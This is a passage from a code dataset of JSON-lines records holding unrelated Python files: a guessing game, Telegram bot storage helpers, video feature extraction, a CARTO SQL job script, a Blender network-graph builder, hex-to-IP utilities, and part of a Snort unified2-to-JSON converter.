fc=(0.5, 0.5, 0.5), alpha=0.1))\r\n","repo_name":"jtamames/SqueezeMeta","sub_path":"lib/checkm/plot/AbstractPlot.py","file_name":"AbstractPlot.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"61"} +{"seq_id":"22264273417","text":"import random\n\ntopOfRange = input(\"Type a number: \")\n\nif topOfRange.isdigit():\n topOfRange = int(topOfRange)\n\n if topOfRange <= 0:\n print(\"Please type a number greater than 0 next time. \")\n quit()\nelse:\n print(\"Please type a number next time\")\n quit()\n\nrandomNumber = random.randint(0, topOfRange)\nguesses = 0\n\nwhile True:\n guesses += 1\n userGuess = input(\"Make a guess. \")\n if userGuess.isdigit():\n userGuess = int(userGuess)\n else:\n print(\"Please type a number next time\")\n continue\n\n if userGuess == randomNumber:\n print(\"You got it right!\")\n break\n elif userGuess > randomNumber:\n print(\"You were above the number.\")\n else:\n print(\"You were below the number. \")\n\nprint(\"You got it in\", guesses, \"guesses\")\n","repo_name":"neophyte-programmer/allpythonexecises","sub_path":"numberGuesserGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38052641999","text":"from . 
import dB\n\n# ----------------------BoardCast_db-----------------\n\n\ndef add_user(id):\n board = eval(dB.get(\"BOARDCAST_USERS\") or \"[]\")\n if id not in board:\n board.append(id)\n dB.set(\"BOARDCAST_USERS\", str(board).replace(\" \", \"\"))\n\n\ndef rem_user(id):\n board = eval(dB.get(\"BOARDCAST_USERS\") or \"[]\")\n if id in board:\n board.remove(id)\n dB.set(\"BOARDCAST_USERS\", str(board).replace(\" \", \"\"))\n\n\ndef get_users():\n return eval(dB.get(\"BOARDCAST_USERS\") or \"[]\")\n\n\n# ------------------------STORE_DB------------------\n\n\ndef info_own_iteam(unique_id, owner_id):\n _ = eval(dB.get(\"OWNERS_OF_ITEAMS\") or \"{}\")\n xx = _.get(str(owner_id)) or []\n if unique_id not in xx:\n xx.append(unique_id)\n _.update({str(owner_id): xx})\n dB.set(\"OWNERS_OF_ITEAMS\", str(_))\n\n\ndef get_info_own_iteam(owner_id):\n _ = eval(dB.get(\"OWNERS_OF_ITEAMS\") or \"{}\")\n return _.get(str(owner_id)) or []\n\n\ndef store_iteam(unique_id, id):\n _ = eval(dB.get(\"STORE\") or \"{}\")\n _.update({unique_id: str(id)})\n dB.set(\"STORE\", str(_))\n\n\ndef get_stored_iteam(unique_id):\n _ = eval(dB.get(\"STORE\") or \"{}\")\n if _.get(unique_id):\n try:\n return eval(_[unique_id])\n except BaseException:\n return None\n else:\n return None\n\n\ndef del_stored_iteam(unique_id, id):\n _ = eval(dB.get(\"STORE\") or \"{}\")\n _x = eval(dB.get(\"OWNERS_OF_ITEAMS\") or \"{}\")\n if unique_id in _:\n _.pop(unique_id)\n dB.set(\"STORE\", str(_))\n xn = _x.get(str(id)) or []\n if unique_id in xn:\n xn.remove(unique_id)\n dB.set(\"OWNERS_OF_ITEAMS\", str(_x))\n","repo_name":"kaif-00z/Public-FileSharingBot","sub_path":"bot/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"2777988804","text":"import numpy as np\nimport cv2\nimport math\nfrom sklearn import preprocessing\nfrom numpy import unravel_index\nimport time\nimport os\n\ndef Dollar(video):\n video_read = \"videos_hmdb/\" + video\n cap = cv2.VideoCapture(video_read)\n\n # ==========================================================\n # i = 1;\n # while (True):\n # # Capture frame-by-frame\n # ret, frame = cap.read()\n #\n # # Our operations on the frame come here\n # # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #\n # # Display the resulting frame\n # cv2.imshow('frame', frame)\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # cv2.imwrite('img/gray/' + str(i) + '.jpg', gray)\n # i += 1\n # if cv2.waitKey(0) & 0xFF == ord('q'):\n # break\n #\n # # When everything done, release the capture\n # cap.release()\n # cv2.destroyAllWindows()\n\n frames = []\n while True:\n ret, frame = cap.read()\n if not ret:\n break\n # t = resize(frame, (200, 200, 3))\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # cv2.imshow('img2', gray)\n\n # img = np.zeros((100, 100, 3))\n # for i in range(3):\n # img[:, :, i] = cv2.resize(frame[:, :, i], (100, 100))\n # cv2.imshow('img', cv2.resize(frame[:, :, i], (224, 224)))\n # if cv2.waitKey(0) & 0xFF == ord('q'):\n # break\n\n # print(img.shape)\n # img = img.astype(np.uint8)\n # cv2.imshow(\"img\", img)\n if cv2.waitKey(0) & 0xFF == ord('q'):\n break\n # cv2.imshow(\"img\", img)\n # exit()\n frames.append(gray)\n # varaibels -------------------\n bound_spatial = 9\n bound_temporal = 11\n sigma = 2.4\n tau = 1.7\n omega = 1 / tau\n number_of_R_value = 1\n NumberFrame = len(frames)\n bt = int((bound_temporal - 1) / 2)\n bs = int((bound_spatial - 1) / 2)\n width = 
len(frames[0][0])\n height = len(frames[0])\n # print('width: {}, height: {}'.format(width, height))\n # --------------------\n # Gaussian\n frames = np.array(frames)\n print(frames.shape)\n for f in range(NumberFrame):\n frames[f, :, :] = cv2.GaussianBlur(frames[f, :, :], (bound_spatial, bound_spatial), sigma)\n # cv2.imwrite('img/blure/' + str(f) + '.jpg', frames[f, :, :])\n #--------------\n # gabor filter\n Hev = np.zeros((1, bound_temporal))\n Hod = np.zeros((1, bound_temporal))\n ti = range(-5, 6, 1)\n ti = np.array(ti)\n for h in range(bound_temporal):\n Hev[0, h] = -1 * math.cos(2 * math.pi * ti[h] * omega) * math.exp(-1 * (ti[h] ** 2) / (tau ** 2))\n Hod[0, h] = -1 * math.sin(2 * math.pi * ti[h] * omega) * math.exp(-1 * (ti[h] ** 2) / (tau ** 2))\n # Hev = preprocessing.normalize(Hev, norm='l1')\n # Hod = preprocessing.normalize(Hod, norm='l1')\n # frames = np.array(frames, dtype='f')\n rarry = np.zeros((frames.shape[0], frames.shape[1], frames.shape[2]))\n\n\n maxarray = []\n\n # print(frames[10-bt:10+bt, 10-bs:10+bs, 10-bs:10+bs])\n\n for f in range(NumberFrame):\n if bt <= f < NumberFrame - bt:\n for h in range(height):\n for w in range(width):\n rarry[f, h, w] = (sum(Hev[0] * frames[(f-bt):(f+bt+1), h, w]) ** 2) + (sum(Hod[0] * frames[(f-bt):(f+bt+1), h, w]) ** 2)\n\n # cv2.imwrite('img/gabor/' + str(f) + '.jpg', rarry[f, :, :])\n # find max R\n img = rarry[f, :, :]\n # print('f = ', f)\n # print('===============')\n\n idx = 0\n # img[0:bs+1, :] = 255\n # img[height-bs:, width-bs:] = 0\n # cv2.imwrite('action/img' + str(f) + '.jpg', img)\n # print(img[0:bs, 0:bs])\n while idx < number_of_R_value:\n h, w = np.where(img == np.amax(img))\n value = img[h[0], w[0]]\n # print(\"f = {}, h = {}, w ={}, value = {}\".format(f, h, w, value))\n maxarray.append([f, h[0], w[0], value])\n img[(h[0] - 1):(h[0] + 2), (w[0] - 1):(w[0] + 2)] = 0\n idx += 1\n else:\n rarry[f, :, :] = 0\n\n # ==========================================================\n cap = cv2.VideoCapture(video_read)\n f = 0\n print('start:')\n while(True):\n ret, frame = cap.read()\n img2 = frame\n if ret == True:\n if bt <= f < len(frames)-bt:\n v = 0\n for item in maxarray:\n if item[0] == f:\n if v < 5:\n if v == 1:\n img2 = cv2.rectangle(frame, (item[2], item[1]), (item[2] + 3, item[1] + 3), (45, 255, 255), 3)\n cv2.imshow('img2', img2)\n else:\n img2 = cv2.rectangle(frame, (item[2], item[1]), (item[2] + 3, item[1] + 3), (45, 255, 255), 3)\n cv2.imshow('img2', img2)\n v += 1\n else:\n break\n\n cv2.imwrite('img/dollar3/' + str(f) + '.jpg', img2)\n f += 1\n if cv2.waitKey(0) & 0xFF == ord('q'):\n break\n else:\n break\n cap.release()\n cv2.destroyAllWindows()\n\n return maxarray\n\n\npath = \"videos_hmdb/\"\nlst = os.listdir(path)\nlst2 = os.listdir('maxvalue_hmdb/')\nfor file in lst:\n file = '15020' \\\n '.avi'\n start_time = time.time()\n print(file)\n Dollar(file)\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"atefehmoradyani/HAR","sub_path":"Dollarextract.py","file_name":"Dollarextract.py","file_ext":"py","file_size_in_byte":5628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70661334594","text":"import argparse\nimport logging\nimport os\nimport warnings\n\nfrom carto.auth import APIKeyAuthClient\nfrom carto.sql import BatchSQLClient\n\nwarnings.filterwarnings('ignore')\n\n# Logger (better than print)\nlogging.basicConfig(\n level=logging.INFO,\n format=' %(asctime)s - %(levelname)s - %(message)s',\n datefmt='%I:%M:%S 
%p')\nlogger = logging.getLogger()\n\n# set input arguments\nparser = argparse.ArgumentParser(\n description='Creates a Batch SQL API job and waits for its completion')\n\nparser.add_argument('--query', type=str, dest='query',\n help='Set the query that you want to apply')\n\nparser.add_argument('--organization', type=str, dest='organization',\n default=os.environ['CARTO_ORG'] if 'CARTO_ORG' in os.environ else '',\n help='Set the name of the organization' +\n ' account (defaults to env variable CARTO_ORG)')\n\nparser.add_argument('--base_url', type=str, dest='CARTO_BASE_URL',\n default=os.environ['CARTO_API_URL'] if 'CARTO_API_URL' in os.environ else '',\n help='Set the base URL. For example:' +\n ' https://username.carto.com/ ' +\n '(defaults to env variable CARTO_API_URL)')\n\nparser.add_argument('--api_key', dest='CARTO_API_KEY',\n default=os.environ['CARTO_API_KEY'] if 'CARTO_API_KEY' in os.environ else '',\n help='Api key of the account' +\n ' (defaults to env variable CARTO_API_KEY)')\n\nargs = parser.parse_args()\n\n# Set authentification to CARTO\nif args.CARTO_BASE_URL and args.CARTO_API_KEY and args.organization:\n auth_client = APIKeyAuthClient(\n args.CARTO_BASE_URL, args.CARTO_API_KEY, args.organization)\n batchSQLClient = BatchSQLClient(auth_client)\nelse:\n logger.error('You need to provide valid credentials, run with -h parameter for details')\n import sys\n sys.exit(1)\n\njob = batchSQLClient.create_and_wait_for_completion(args.query)\nlogger.info('Job finished with status {status}'.format(status=job['status']))\n","repo_name":"CartoDB/carto-python","sub_path":"examples/sql_batch_api_wait_for_completion.py","file_name":"sql_batch_api_wait_for_completion.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"61"} +{"seq_id":"35176789958","text":"import json\r\nimport os\r\nimport re\r\nimport sys\r\nfrom copy import deepcopy\r\nfrom itertools import combinations, repeat, takewhile\r\nfrom json import encoder\r\nfrom math import sqrt\r\nfrom operator import add\r\nfrom random import choice, uniform\r\n\r\nimport numpy as np\r\nimport igraph as ig\r\n\r\nimport bgl\r\nimport blf\r\nimport bpy\r\nfrom bpy.props import *\r\nfrom bpy_extras import view3d_utils\r\nfrom bpy.types import NodeTree, Node, NodeSocket\r\n\r\nglobal he\r\n\r\ndef dumps(obj):\r\n \"\"\"Outputs json with formatting edits + object handling.\"\"\"\r\n return json.dumps(obj, indent=4, sort_keys=True, cls=CustomEncoder)\r\nclass CustomEncoder(json.JSONEncoder):\r\n\r\n def encode(self, obj):\r\n \"\"\"Fired for every object.\"\"\"\r\n s = super(CustomEncoder, self).encode(obj)\r\n # If uncompressed, postprocess for formatting\r\n if len(s.splitlines()) > 1:\r\n s = self.postprocess(s)\r\n return s\r\n\r\n def postprocess(self, json_string):\r\n \"\"\"Displays each entry on its own line.\"\"\"\r\n is_compressing, is_hash, compressed, spaces = False, False, [], 0\r\n for row in json_string.split(\"\\n\"):\r\n if is_compressing:\r\n if (row[:spaces + 5] == \" \" * (spaces + 4) +\r\n (\"\\\"\" if is_hash else \"{\")):\r\n compressed.append(row.rstrip())\r\n elif (len(row) > spaces and row[:spaces] == \" \" * spaces and\r\n re.match(\"[\\]\\}],?\", row[spaces:].rstrip())):\r\n compressed.append(row.rstrip())\r\n is_compressing = False\r\n else:\r\n compressed[-1] += \" \" + row.strip()\r\n else:\r\n compressed.append(row.rstrip())\r\n if any(a in row for a in [\"edges\", \"nodes\"]):\r\n # Fix to handle issues that arise with 
empty lists\r\n                    if \"[]\" in row:\r\n                        continue\r\n                    spaces = sum(1 for _ in takewhile(str.isspace, row))\r\n                    is_compressing, is_hash = True, \"{\" in row\r\n        return \"\\n\".join(compressed)\r\n\r\ndef generate_edges(*args, **kw):\r\n    if kw['r_name'] in args:\r\n        i = args.index(kw[\"r_name\"])\r\n    if kw['net_name'] in args:\r\n        j = args.index(kw[\"net_name\"])\r\n    tup = (i, j)\r\n    Edges.append(tup)\r\n    \r\ndef generate_edges2(*args, **kw):\r\n    if kw[\"display_name\"] in args:\r\n        j = args.index(kw[\"display_name\"])\r\n    if kw['net_name'] in args:\r\n        i = args.index(kw[\"net_name\"])\r\n    tup = (i, j)\r\n    Edges.append(tup)\r\n\r\nclass VadCustomTree(NodeTree):\r\n    '''A vad node tree type that will show up in the node editor header'''\r\n    bl_idname = 'VadTreeType'\r\n    bl_label = 'Vad Node Tree'\r\n    bl_icon = 'NODETREE'\r\n\r\n# Vad socket type\r\nclass VadCustomSocket(NodeSocket):\r\n    '''Vad node socket type'''\r\n    bl_idname = 'VadSocketType'\r\n    bl_label = 'Vad Node Socket'\r\n\r\n    def draw(self, context, layout, node, text):\r\n        layout.label(text)\r\n\r\n    def draw_color(self, context, node):\r\n        return (1.0, 0.4, 0.216, 0.5)\r\n\r\n\r\nclass VadCustomTreeNode:\r\n    @classmethod\r\n    def poll(cls, ntree):\r\n        return ntree.bl_idname == 'VadTreeType'\r\n\r\n\r\nclass VadCustomNode(Node, VadCustomTreeNode):\r\n    '''A custom node'''\r\n    bl_idname = 'VadNodeType'\r\n    bl_label = 'Vad Node'\r\n    bl_icon = 'SOUND'\r\n    \r\n    string_name = bpy.props.StringProperty()\r\n    \r\n    index = bpy.props.IntProperty(default = 0)\r\n    \r\n    def init(self, context):\r\n        self.inputs.new('VadSocketType', \" \")\r\n        \r\n        self.outputs.new('NodeSocketColor', \" \")\r\n        \r\n    def copy(self, node):\r\n        print(\"Copying from node \", node)\r\n        \r\n    def free(self):\r\n        print(\"Removing node \", self, \", Goodbye!\")\r\n        \r\n    def draw_buttons(self, context, layout):\r\n        layout.label(self.string_name)\r\n        \r\n    def draw_label(self):\r\n        return \"vad node\"\r\n\r\nclass OBJECT_OT_HelloButton(bpy.types.Operator):\r\n    bl_idname = \"hello.hello\"\r\n    bl_label = \"Say Hello\"\r\n    \r\n    def execute(self, context):\r\n        print(\"hhh\")\r\n        # Blender operators must return a completion status set\r\n        return {'FINISHED'}\r\n\r\nimport nodeitems_utils\r\nfrom nodeitems_utils import NodeCategory, NodeItem\r\n\r\nclass VadNodeCategory(NodeCategory):\r\n    @classmethod\r\n    def poll(cls, context):\r\n        return context.space_data.tree_type == 'VadTreeType'\r\n\r\nnode_categories = [\r\n    # identifier, label, items list\r\n    VadNodeCategory(\"SOMENODES\", \"Some Nodes\", items=[\r\n        # our basic node\r\n        NodeItem(\"VadNodeType\"),\r\n        ]),\r\n    ]\r\n\r\ndef register():\r\n    bpy.utils.register_class(VadCustomTree)\r\n    bpy.utils.register_class(VadCustomSocket)\r\n    bpy.utils.register_class(VadCustomNode)\r\n    bpy.utils.register_class(OBJECT_OT_HelloButton)\r\n\r\n    nodeitems_utils.register_node_categories(\"CUSTOM_NODES\", node_categories)\r\n\r\n\r\ndef unregister():\r\n    nodeitems_utils.unregister_node_categories(\"CUSTOM_NODES\")\r\n\r\n    bpy.utils.unregister_class(VadCustomTree)\r\n    bpy.utils.unregister_class(VadCustomSocket)\r\n    bpy.utils.unregister_class(VadCustomNode)\r\n    bpy.utils.unregister_class(OBJECT_OT_HelloButton)\r\n\r\n    \r\ndata0 = []\r\ndata1 = []\r\nif __name__ == \"__main__\":\r\n    register()\r\n    Edges=[]\r\n    with open(\"e:/20190116_1.json\") as in_file:\r\n        for line in in_file.readlines():\r\n            edges1 = json.loads(line)\r\n            data0.append(edges1)\r\n    with open(\"e:/20190116_2.json\") as in_file:\r\n        for line in in_file.readlines():\r\n            edges2 = json.loads(line)\r\n            data1.append(edges2)\r\n    \r\n    edges = data0\r\n    edges1 = data1\r\n    \r\n    available_nodes = set(e['r_name'] for e in edges) | set(e[\"net_name\"] for e in edges) | set(e[\"display_name\"] for e in data1)\r\n\r\n    labels = list(available_nodes)\r\n    \r\n    \r\n    for k in range(len(edges)):\r\n        generate_edges(*labels, **edges[k])\r\n    \r\n    for k in range(len(edges1)):\r\n        generate_edges2(*labels, **edges1[k])\r\n    \r\n    G = ig.Graph(Edges, directed = False)\r\n\r\n    layt = G.layout(\"tree\")\r\n    layt.center()\r\n    master_nodes = {}\r\n    for i in range(len(labels)):\r\n        master_nodes[labels[i]] = {\"location\":[j*200 for j in layt[i]]}\r\n        tmp = master_nodes[labels[i]][\"location\"][0]\r\n        master_nodes[labels[i]][\"location\"][0] = master_nodes[labels[i]][\"location\"][1]\r\n        master_nodes[labels[i]][\"location\"][1] = tmp\r\n    \r\n    json_str = dumps({\"edges\": edges+edges1, \"nodes\": master_nodes})\r\n    network = json.loads(json_str)\r\n    \r\n    bpy.context.scene.use_nodes = True\r\n    tree = bpy.context.scene.node_tree\r\n\r\n    # clear default nodes\r\n    for node in tree.nodes:\r\n        tree.nodes.remove(node)\r\n    \r\n    for vad_label in labels:\r\n        vad_node = tree.nodes.new(type='VadNodeType')\r\n        vad_node.location = tuple(network[\"nodes\"][vad_label][\"location\"])\r\n        vad_node.name = vad_label\r\n        vad_node.label = vad_label\r\n        vad_node.inputs[0].link_limit = 4095\r\n        #vad_node.inputs.new('VadSocketType', \" \")\r\n    \r\n    links = tree.links\r\n    \r\n    for e in edges:\r\n        source_r = tree.nodes[e[\"r_name\"]]\r\n        source_net = tree.nodes[e[\"net_name\"]]\r\n        \r\n        if e[\"net_name\"]==\"public\":\r\n            links.new(source_net.outputs[0], source_r.inputs[0])\r\n        else:\r\n            links.new(source_r.outputs[0], source_net.inputs[0])\r\n    \r\n    for e in edges1:\r\n        source = tree.nodes[e[\"net_name\"]]\r\n        target = tree.nodes[e[\"display_name\"]]\r\n        links.new(source.outputs[0], target.inputs[0])\r\n    \r\n","repo_name":"hustWang/test","sub_path":"blender/network_topology.py","file_name":"network_topology.py","file_ext":"py","file_size_in_byte":7493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"71403100994","text":"def toIpAdress(hexIp):\n    # print(\"hex ip is {}\".format(hexIp))\n    if(len(hexIp) == 8):\n        res = \"\"\n        res = res + str(int(\"0x\"+hexIp[0:2], 16))+\".\"\n        res = res + str(int(\"0x\"+hexIp[2:4], 16))+\".\"\n        res = res + str(int(\"0x\"+hexIp[4:6], 16))+\".\"\n        res = res + str(int(\"0x\"+hexIp[6:8], 16))\n        return res\n    else:\n        print(\"Error: wrong hex length for an IP address\")\n        return False\n\ndef hexToMac(hexMac):\n    if(len(hexMac) == 12):\n        res = hexMac[0:2] + \":\" + hexMac[2:4] + \":\" + hexMac[4:6] + \\\n            \":\" + hexMac[6:8] + \":\" + hexMac[8:10] + \":\" + hexMac[10:12]\n        return res\n    else:\n        print(\"Error: wrong MAC address length: {}\".format(len(hexMac)))\n        return False\n\ndef get_ascii(str):\n    res = \"\"\n    i = 0\n    while(i < len(str)):\n        curr = str[i : i + 2]\n        if (curr == \"00\"):\n            break\n        res += chr(int(\"0x\" + curr, 16))\n        i += 2\n    return res\n\n# print(get_ascii(\"30313233343500000000000031231\"))","repo_name":"Cyren4/wiredolp","sub_path":"sources/web/Node-app/pythonScript/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"29274564055","text":"from __future__ import print_function\n\nimport sys\nimport os\nimport os.path\nimport base64\nimport string\nimport json\nimport logging\n\nif sys.argv[0] == __file__:\n    sys.path.insert(\n        0, os.path.abspath(os.path.join(__file__, \"..\", 
\"..\", \"..\")))\n\ntry:\n import argparse\nexcept ImportError as err:\n from idstools.compat.argparse import argparse\n\ntry:\n from collections import OrderedDict\nexcept ImportError as err:\n from idstools.compat.ordereddict import OrderedDict\n\nfrom idstools import unified2\nfrom idstools import maps\nfrom idstools import util\n\nlogging.basicConfig(level=logging.INFO, format=\"%(levelname)s: %(message)s\")\nLOG = logging.getLogger()\n\nclass Formatter(object):\n\n def __init__(self, msgmap=None, classmap=None, packet_printable=False,\n packet_hex=False, extra_printable=False):\n self.msgmap = msgmap\n self.classmap = classmap\n self.packet_printable = packet_printable\n self.packet_hex = packet_hex\n self.extra_printable = extra_printable\n\n def key(self, key):\n return key\n\n def resolve_msg(self, event, default=None):\n if self.msgmap:\n signature = self.msgmap.get(\n event[\"generator-id\"], event[\"signature-id\"])\n if signature:\n return signature[\"msg\"]\n return default\n\n def resolve_classification(self, event, default=None):\n if self.classmap:\n classinfo = self.classmap.get(event[\"classification-id\"])\n if classinfo:\n return classinfo[\"description\"]\n return default\n\n def format_event(self, record):\n event = {}\n\n msg = self.resolve_msg(record)\n if msg:\n event[\"msg\"] = msg\n classification = self.resolve_classification(record)\n if classification:\n event[\"classification\"] = classification\n\n for key in record:\n if key.endswith(\".raw\"):\n continue\n elif key in [\"extra-data\", \"packets\"]:\n continue\n elif key == \"appid\" and not record[\"appid\"]:\n continue\n else:\n event[key] = record[key]\n return OrderedDict([(\"type\", \"event\"), (\"event\", event)])\n\n def format_packet(self, record):\n packet = {}\n for key in record:\n if key == \"data\":\n packet[\"data\"] = base64.b64encode(record[key]).decode(\"utf-8\")\n if self.packet_printable:\n packet[\"data-printable\"] = util.format_printable(\n record[key])\n if self.packet_hex:\n packet[\"data-hex\"] = self.format_hex(record[key])\n else:\n packet[key] = record[key]\n return OrderedDict([(\"type\", \"packet\"), (\"packet\", packet)])\n\n def format_hex(self, data):\n if sys.version_info.major < 3:\n hexbytes = [\"%02x\" % ord(byte) for byte in data]\n else:\n hexbytes = [\"%02x\" % byte for byte in data]\n return \" \".join(hexbytes)\n\n def format_extra_data(self, record):\n data = {}\n\n # Remove this, the printable data is accessible as\n # \"data-printable\" now.\n #\n # # For data types that can be printed in plain text, extract\n # # the data into its own field with a descriptive name.\n # if record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"SMTP_FILENAME\"]:\n # data[\"smtp-filename\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"SMTP_MAIL_FROM\"]:\n # data[\"smtp-from\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"SMTP_RCPT_TO\"]:\n # data[\"smtp-rcpt-to\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"SMTP_HEADERS\"]:\n # data[\"smtp-headers\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"HTTP_URI\"]:\n # data[\"http-uri\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"HTTP_HOSTNAME\"]:\n # data[\"http-hostname\"] = record[\"data\"]\n # elif record[\"type\"] == unified2.EXTRA_DATA_TYPE[\"NORMALIZED_JS\"]:\n # data[\"javascript\"] = record[\"data\"]\n # else:\n # LOG.warning(\"Unknown extra-data record type: %s\" % (\n # 
str(record[\"type\"])))\n\n for key, val in unified2.EXTRA_DATA_TYPE.items():\n if val == record[\"type\"]:\n data[self.key(\"extra-data-type\")] = key.lower()\n break\n\n for key in record:\n if key == \"data\":\n data[\"data\"] = base64.b64encode(record[key]).decode(\"utf-8\")\n if self.extra_printable:\n data[\"data-printable\"] = util.format_printable(record[key])\n else:\n data[key] = record[key]\n\n return OrderedDict([(\"type\", self.key(\"extra-data\")),\n (self.key(\"extra-data\"), data)])\n\n def format(self, record):\n if isinstance(record, unified2.Event):\n return self.format_event(record)\n elif isinstance(record, unified2.Packet):\n return self.format_packet(record)\n elif isinstance(record, unified2.ExtraData):\n return self.format_extra_data(record)\n else:\n LOG.warning(\"Unknown record type: %s: %s\" % (\n str(record.__class__), str(record)))\n\nclass OutputWrapper(object):\n\n def __init__(self, filename, fileobj=None):\n self.filename = filename\n self.fileobj = fileobj\n\n if self.fileobj is None:\n self.isfile = True\n self.reopen()\n else:\n self.isfile = False\n\n def reopen(self):\n if not self.isfile:\n return\n if self.fileobj:\n self.fileobj.close()\n self.fileobj = open(self.filename, \"a\")\n\n def write(self, buf):\n if self.isfile:\n if not os.path.exists(self.filename):\n self.reopen()\n self.fileobj.write(buf)\n self.fileobj.write(\"\\n\")\n self.fileobj.flush()\n\ndef load_from_snort_conf(snort_conf, classmap, msgmap):\n snort_etc = os.path.dirname(os.path.expanduser(snort_conf))\n\n classification_config = os.path.join(snort_etc, \"classification.config\")\n if os.path.exists(classification_config):\n LOG.debug(\"Loading %s.\", classification_config)\n classmap.load_from_file(open(classification_config))\n\n genmsg_map = os.path.join(snort_etc, \"gen-msg.map\")\n if os.path.exists(genmsg_map):\n LOG.debug(\"Loading %s.\", genmsg_map)\n msgmap.load_generator_map(open(genmsg_map))\n\n sidmsg_map = os.path.join(snort_etc, \"sid-msg.map\")\n if os.path.exists(sidmsg_map):\n LOG.debug(\"Loading %s.\", sidmsg_map)\n msgmap.load_signature_map(open(sidmsg_map))\n\nepilog = \"\"\"If --directory and --prefix are provided files will be\nread from the specified 'spool' directory. Otherwise files on the\ncommand line will be processed.\n\"\"\"\n\ndef rollover_hook(closed, opened):\n \"\"\" The rollover hook for the spool reader. Will delete the closed file. 
\"\"\"\n LOG.debug(\"closed=%s; opened=%s\" % (closed, opened))\n LOG.debug(\"Deleting %s.\", closed)\n os.unlink(closed)\n\ndef main():\n\n msgmap = maps.SignatureMap()\n classmap = maps.ClassificationMap()\n\n parser = argparse.ArgumentParser(\n fromfile_prefix_chars='@', epilog=epilog)\n parser.add_argument(\n \"-C\", dest=\"classification_path\", metavar=\"\",\n help=\"path to classification config\")\n parser.add_argument(\n \"-S\", dest=\"sidmsgmap_path\", metavar=\"\",\n help=\"path to sid-msg.map\")\n parser.add_argument(\n \"-G\", dest=\"genmsgmap_path\", metavar=\"\",\n help=\"path to gen-msg.map\")\n parser.add_argument(\n \"--snort-conf\", dest=\"snort_conf\", metavar=\"\",\n help=\"attempt to load classifications and map files based on the \"\n \"location of the snort.conf\")\n parser.add_argument(\n \"--directory\", metavar=\"\",\n help=\"spool directory (eg: /var/log/snort)\")\n parser.add_argument(\n \"--prefix\", metavar=\"\",\n help=\"spool filename prefix (eg: unified2.log)\")\n parser.add_argument(\n \"--bookmark\", metavar=\"\", help=\"enable bookmarking\")\n parser.add_argument(\n \"--follow\", action=\"store_true\", default=False,\n help=\"follow files/continuous mode (spool mode only)\")\n parser.add_argument(\n \"--delete\", action=\"store_true\", default=False,\n help=\"delete spool files\")\n parser.add_argument(\n \"--output\", metavar=\"\",\n help=\"output filename (eg: /var/log/snort/alerts.json\")\n parser.add_argument(\n \"--stdout\", action=\"store_true\", default=False,\n help=\"also log to stdout if --output is a file\")\n parser.add_argument(\n \"--sort-keys\", dest=\"sort_keys\", action=\"store_true\", default=False,\n help=\"the output of dictionaries will be sorted by key\")\n parser.add_argument(\n \"--verbose\", action=\"store_true\", default=False,\n help=\"be more verbose\")\n parser.add_argument(\n \"--packet-printable\", action=\"store_true\", default=False,\n help=\"output printable packet data in addition to base64\")\n parser.add_argument(\n \"--packet-hex\", action=\"store_true\", default=False,\n help=\"output packet data as hex in addition to base64\")\n parser.add_argument(\n \"--extra-printable\", action=\"store_true\", default=False,\n help=\"output printable extra data in addition to base64\")\n parser.add_argument(\n \"filenames\", nargs=\"*\")\n args = parser.parse_args()\n\n if args.verbose:\n LOG.setLevel(logging.DEBUG)\n\n if args.snort_conf:\n load_from_snort_conf(args.snort_conf, classmap, msgmap)\n\n if args.classification_path:\n classmap.load_from_file(\n open(os.path.expanduser(args.classification_path)))\n if args.genmsgmap_path:\n msgmap.load_generator_map(open(os.path.expanduser(args.genmsgmap_path)))\n if args.sidmsgmap_path:\n msgmap.load_signature_map(open(os.path.expanduser(args.sidmsgmap_path)))\n\n if msgmap.size() == 0:\n LOG.warning(\"No alert message map entries loaded.\")\n else:\n LOG.info(\"Loaded %s rule message map entries.\", msgmap.size())\n\n if classmap.size() == 0:\n LOG.warning(\"No classifications loaded.\")\n else:\n LOG.info(\"Loaded %s classifications.\", classmap.size())\n\n outputs = []\n\n if args.output:\n outputs.append(OutputWrapper(args.output))\n if args.stdout:\n outputs.append(OutputWrapper(\"-\", sys.stdout))\n else:\n outputs.append(OutputWrapper(\"-\", sys.stdout))\n\n bookmark = None\n\n if args.filenames:\n if args.bookmark:\n LOG.error(\"Bookmarking not valid in file mode.\")\n return 1\n if args.follow:\n LOG.error(\"Follow not valid in file mode.\")\n return 1\n if args.delete:\n 
